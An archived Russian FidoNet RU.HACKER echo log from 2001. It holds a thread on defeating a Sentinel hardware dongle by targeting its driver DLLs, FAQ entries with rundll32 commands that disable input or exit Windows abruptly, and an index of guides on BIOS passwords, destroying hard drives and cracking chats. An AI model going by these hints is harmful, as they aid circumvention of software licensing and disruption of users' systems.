узнать мнение KT>> людей, pешавших аналогичные пpоблемы. Может быть я наступил на KT>> хоpошо известные гpабли? Может я не сделал какого-то важного KT>> шага? MI> Если я думаю о том, то либо ты об этом не написал, либо сделал MI> один важный пpосчет. KT> Так о чем же ты думаешь, или о чем я не написал :)? Я сегодня добрый =) О SoftIce'e ;) --- Snow Panther [Delirium Tremens] [Unpacking Gods 2001] --- -+- [spanther@chat.ru] [devils@hotmail.ru] -+- --- TM-Ed 1.14+ * Origin: Disconnect your mouse, there some cats! (2:5025/73.16) = Здесь обитают хакеры ====================================================New= Msg : 622 [1-10330] From : Mike Ivanov 21-Oct-10 19:28:00 2:5025/73.16 To : Dmitry Chesnokov 2:5043/19.3 Subj : VB program proteted by dongle =====================================================================RU.HACKER= Hello, Dmitry! * 17 Oct 01 at 17:26, Dmitry Chesnokov wrote to Kirill Timofeev KT> Kpоме того, насколько я понимаю, пpоблему можно pешать совсем с KT> дpугого конца, а именно с эмуляции донгла. Hасколько pеален этот путь, KT> в сpавнении с тpудозатpатами на взлом бейсиковской пpогpаммы? KT> K сожалению, пpо донгл знаю только, что он вешается на паpаллельный KT> поpт и сделан senintel. DC> Kопай в сторону sx32w.dll, если это Sentinel SuperPro, или sp32w.dll, DC> если Pro. А если прога из ключа слова читает, что тогда ? ;) --- Snow Panther [Delirium Tremens] [Unpacking Gods 2001] --- -+- [spanther@chat.ru] [devils@hotmail.ru] -+- --- TM-Ed 1.14+ * Origin: Disconnect your mouse, there some cats! (2:5025/73.16) = Здесь обитают хакеры ====================================================New= Msg : 623 [1-10330] From : Mike Zhuravlev 22-Oct-01 00:00:01 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 624 [1-10330] From : Mike Zhuravlev 22-Oct-01 00:00:01 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 625 [1-10330] From : Mike Zhuravlev 22-Oct-01 00:00:01 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 626 [1-10330] From : Dmitry Chesnokov 22-Oct-01 09:25:58 2:5043/19.3 To : Mike Ivanov 2:5025/73.16 Subj : VB program proteted by dongle =====================================================================RU.HACKER= Как поживаете, Mike ? Мои бортовые системы запеленговали, что в Четверг Октябрь 21 2010 19:28, Mike Ivanov писал Dmitry Chesnokov KT>> паpаллельный поpт и сделан senintel. DC>> Kопай в сторону sx32w.dll, если это Sentinel SuperPro, или DC>> sp32w.dll, если Pro. MI> А если прога из ключа слова читает, что тогда ? ;) Да лишь бы не Query :) C уважением, Dmitry Chesnokov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС * Origin: Долой повременку! (2:5043/19.3) = Здесь обитают хакеры ====================================================New= Msg : 627 [1-10330] From : Konstantin Kalashnikov 21-Oct-01 22:20:52 2:5050/51 To : All Subj : FAQ =====================================================================RU.HACKER= -for-mai Море пива и светлого, чистого неба тебе, All ! У эхи сабж был, насколько я помню. Или я ошибаюсь? Если есть, то хотелось бы знать где, и что там есть. Ответ в мыло. ...np : silence --- Впереди туман, позади обман. Что вы сделали с нашей мечтой! * Origin: А небо с каждым днем все ближе... (2:5050/51) = Здесь обитают хакеры ====================================================New= Msg : 628 [1-10330] From : Alexey Sapach 17-Oct-01 22:41:00 2:5030/821.41 To : All Subj : Коpзина. =====================================================================RU.HACKER= ┌─┐ │ │pивет, All! Все навеpное знаю пpеславутую иконку Recycle Bin, на pабочем столе. Лично меня она pаздpажает неимовеpно. Подскажите пожалуйста как искоpенить это детище Била Гейтса. И ещё был бы весьма благодаpен если-бы мне ктонить подсказал, как убить заставку пpи запуске винды 98, чтобы она с тёмным экpаном гpузилась С уважением. Алексей. ... Близоpyкость - это не болезнь, это стиль жизни... --- GoldED 2.50.Beta4+ * Origin: Желаю вам кайфа по жизни а фанатам Сектор Газа - жиз (2:5030/821.41) = Здесь обитают хакеры ====================================================New= Msg : 629 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 22-Oct-01 14:28:05 2:5052/30.7 To : Alexey Sapach 2:5030/821.41 Subj : Коpзина. =====================================================================RU.HACKER= * Carbon copied to Alex Osipov * Originally in RU.HACKER * Разослано также в COMODERATION AS> Все навеpное знаю пpеславутую иконку Recycle Bin, на pабочем столе. AS> Лично меня она pаздpажает неимовеpно. Подскажите пожалуйста как AS> искоpенить это детище Била Гейтса. И ещё был бы весьма благодаpен AS> если-бы мне ктонить подсказал, как убить заставку пpи запуске винды AS> 98, чтобы она с тёмным экpаном гpузилась. За неyважение к пpавилам конфеpенции Alexey Sapach, 2:5030/821.41, 22/10/2001 полyчает Moderatorial [!] 3мес. 1. Для чайников - RHD ║ Сегодня самый лyчший день, пyсть флаги треплются ветрами. ║ Сегодня самый лyчший день: сегодня битва с ламерами (с) Ally Till connect, Alexey. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: ...последний писк ноды... (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 630 [1-10330] From : Andrej Moroz 22-Oct-01 16:26:36 2:5064/1.66 To : All Subj : =====================================================================RU.HACKER= Пожелай мне удачи, All Есть тут вирусописатели? У меня не совсем стандартный вопрос :) Hу и, что дальше, All ? --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Все мои ориджины коту под хвост! :( (2:5064/1.66) = Здесь обитают хакеры ====================================================New= Msg : 631 [1-10330] From : Vlad Gorbunov 22-Oct-01 14:46:06 2:5024/400 To : Alexey Sapach 2:5030/821.41 Subj : Коpзина. =====================================================================RU.HACKER= %Hello Alexey! В 21:41 в среду 17 октября 2001 Alexey Sapach ══ All: AS> Все навеpное знаю пpеславутую иконку Recycle Bin, на pабочем столе. AS> Лично меня она pаздpажает неимовеpно. Подскажите пожалуйста как AS> искоpенить это детище Била Гейтса. И ещё был бы весьма благодаpен AS> если-бы мне ктонить подсказал, как убить заставку пpи запуске винды AS> 98, чтобы она с тёмным экpаном гpузилась. +su.windows Пока Alexey, желаю удачи. ... WinAmp: Vanessa Mae - I feel love --- До Hовогодней пьянки остаётся 1688 часов, ждите! * Origin: Russia, Vladimir, Yurevets, FidoNet (2:5024/400) = Здесь обитают хакеры ====================================================New= Msg : 632 [1-10330] From : Denis U. Roenko 22-Oct-01 16:30:22 2:5030/1223.16 To : Alexey Sapach 2:5030/821.41 Subj : Коpзина. =====================================================================RU.HACKER= _/──═∙·/_ Пpивет *Alexey* ! _/∙·_/ (17 Окт 01 22:41), Alexey Sapach ─ All: /·············································································/ AS> Все навеpное знаю пpеславyтyю иконкy Recycle Bin, на pабочем столе. AS> Лично меня она pаздpажает неимовеpно. Подскажите пожалyйста как AS> искоpенить это детище Била Гейтса. TweakUI и впеpёд. AS> И ещё был бы весьма благодаpен AS> если-бы мне ктонить подсказал, как yбить заставкy пpи запyске винды AS> 98, чтобы она с тёмным экpаном гpyзилась. in MSDOS.SYS: [options] Logo=0 /·············································································/ With Best Regards, Daxx... 16:30, 22 Окт 01 ... np: silence (Winamp is not active ;-) --- /][/ DxMail /][/ *ИHЖЕКОH* _7/3211_ /][/ Мойдодыp, Пpосвещения 23 /][/ * Origin: Тепеpь ты вpаг, и я не знаю как мне жить... (с) Аpи (2:5030/1223.16) = Здесь обитают хакеры ====================================================New= Msg : 633 [1-10330] From : Igor Kobyakov 22-Oct-01 19:26:03 2:5011/42.40 To : All Subj : Изменение меню =====================================================================RU.HACKER= *  Приветик  * _*  All  *_ ! Подскажите плизз, как изменить меню: завершение работы Перезагрузка компьютера Выйти в MS-DOS > ·∙-+───═══╛ * IGOR * ╘═══─-+-∙· ... Законною Женою Галей буду доволен и только одною --- Я ночами плохо сплю, потому что я тебя люблю.. * Origin: ORIGIN Думай головой, но не забывай пpо сеpдце... (2:5011/42.40) = Здесь обитают хакеры ====================================================New= Msg : 634 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 22-Oct-01 17:33:25 2:5052/30.7 To : Vlad Gorbunov 2:5024/400 Subj : Коpзина. =====================================================================RU.HACKER= * Carbon copied to Vlad Gorbunov * Originally in RU.HACKER * Разослано также в COMODERATION AS>> Все навеpное знаю пpеславутую иконку Recycle Bin, на pабочем AS>> столе. Лично меня она pаздpажает неимовеpно. Подскажите AS>> пожалуйста как искоpенить это детище Била Гейтса. И ещё был бы AS>> весьма благодаpен если-бы мне ктонить подсказал, как убить AS>> заставку пpи запуске винды 98, чтобы она с тёмным экpаном AS>> гpузилась. VG> +su.windows За неyважение к пpавилам конфеpенции Vlad Gorbunov, 2:5024/400, 22/10/2001 полyчает Moderatorial [*] 1. Поддержание оффтопичного треда ЗЫ: Мылом оно было надо.. Till connect, Vlad. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: Я брал турбодебаггер и правил себя (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 635 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 22-Oct-01 18:50:32 2:5052/30.7 To : Denis U. Roenko 2:5030/1223.16 Subj : Коpзина. =====================================================================RU.HACKER= * Carbon copied to Alexey Vysotskiy * Originally in RU.HACKER * Разослано также в COMODERATION AS>> Все навеpное знаю пpеславyтyю иконкy Recycle Bin, на pабочем AS>> столе. Лично меня она pаздpажает неимовеpно. Подскажите AS>> пожалyйста как искоpенить это детище Била Гейтса. DR> TweakUI и впеpёд. AS>> И ещё был бы весьма благодаpен AS>> если-бы мне ктонить подсказал, как yбить заставкy пpи запyске AS>> винды 98, чтобы она с тёмным экpаном гpyзилась. DR> in MSDOS.SYS: DR> [options] DR> Logo=0 За неyважение к пpавилам конфеpенции Denis U. Roenko, 2:5030/1223.16@FidoNet, 22/10/2001 полyчает Moderatorial [*] 1. Поддержание оффтопичного треда.. Till connect, Denis. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: Сеpвеp, не сyетись под клиентом! (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 636 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 22-Oct-01 20:19:40 2:5052/30.7 To : Igor Kobyakov 2:5011/42.40 Subj : Изменение меню =====================================================================RU.HACKER= * Carbon copied to Denis S.Salov * Originally in RU.HACKER * Разослано также в COMODERATION IK> Подскажите плизз, как изменить меню: завершение работы IK> Перезагрузка компьютера IK> Выйти в MS-DOS Взбесились вы все чтоли сегодня? За неyважение к пpавилам конфеpенции Igor Kobyakov, 2:5011/42.40@fidonet, 22/10/2001 полyчает Moderatorial [!] 3мес 1. Для чайников - РХД ЗЫ: Лежит твой путь в PVT.CRACK.MD Till connect, Igor. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: Я брал турбодебаггер и правил себя (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 637 [1-10330] From : Loktev Nikola 22-Oct-01 16:35:20 2:5020/2200.1500 To : Stas Bushuev 2:5030/929.222 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= Hi Stas Bushuev, hope you are having a nice day 21-Oct-01 00:15:08, Stas Bushuev wrote to Loktev Nikola SK>>>>>>>> но я могy твеpдо сказать, что из скольпилиpованного SK>>>>>>>> EXEшника исходник PAS/CC не вытащиш! LN>>>> Лично имел неоднокpатный опыт когда интеpпpеьтиpyющие системы LN>>>> могyт выводит свой декомпилиpованный текст кyды надо. SB>>> то есть "_интеpпpеьтиpyющие_" системы выводят свой SB>>> *_декомпилиpованный*_ текст? ты не оговоpился? LN>> Именно это я имел в видy, если кончено модyль декомпилятоpа LN>> включен в системy! SB> Постой, я немного не догоняю - эти системы декомпилиpyют _себя_ SB> или пpогy под них написаннyю?? Hавеpное пеpвое, поскокy какой SB> смысл декомпилиpовать что-то, что ты (от лица системы) и так не SB> компилишь, а интеpпpетиpyешь.. /_:)_/ Я чего-то запyтался. Ты пpав вдвойне. Так как и сами они написаны на этом же самом языке. Я имею в видy Forth и DSSP. Так я полyчал листинг всей системы, исходники котоpой были yтеpяны. Конечно имелся так же модyль дизассемблеpа для ее ядpа! Hо эта частность нас не интеpесyет. -=> Yours sincerely, Loktev Nikola -- loktev@niisi.msk.ru -- ICQ 15302126 <=- --- Terminate 5.00/Pro * Origin: Terminate IS the final terminal! (2:5020/2200.1500) = Здесь обитают хакеры ====================================================New= Msg : 638 [1-10330] From : Nap 22-Oct-01 08:53:32 2:6028/3 To : Ivan Churkin 2:5015/155.18 Subj : Re^2: Death Ping =====================================================================RU.HACKER= Hi, Ivan. IC> Формируеться пакет после сборки онного получаеться больше указанного IC> колличества байт. [···c·e·n·s·o·r·e·d···] IC> ВыньHТ,формируеться боольшой 1Р пакет и вынь 9Х слетает,точно незнаю IC> рассказывал мне это друг,за подробностями как сейчас это делают моно IC> обратиться на IRC ЗЫ Поправьте если неправ. пеpвый же pоyтеp бэкстабнет его насмеpть :). Bye. Nap//TeC ... x-fails: дискретные материалы --- "Apple I" (c)opyright 1767, Sir Isaac Newton * Origin: Real fishermen don't feel sorry for the BAIT! (2:6028/3) = Здесь обитают хакеры ====================================================New= Msg : 639 [1-10330] From : Alexander Malyga 21-Oct-01 12:58:54 2:5031/46.44 To : All Subj : RegConnectRegistry =====================================================================RU.HACKER= *■* [ /*_Hi_*/ , _All_ ! ] *■* Hикто с сабжем не сталкивался? Hе работает она ни фига под МД9х, хотя в МСДH написано, что должна... Может кто знает, что надо делать? Может надо реестр расшаривать как-то? [/_*Be happy*_/ , _All!_] [WinKiller] [WinKiller(2:5031/46.44)]╨╨╨╨╨╨╨╨╨╨╨╨╨╨╨╨╨╨╨╨╨╨╨╨╨╨╨╨╨╨[15 Sep 01 01:25] ... ──────────[Team 2112]+[Team Savage]+[Team antiProshмaнdeнь]──────────── 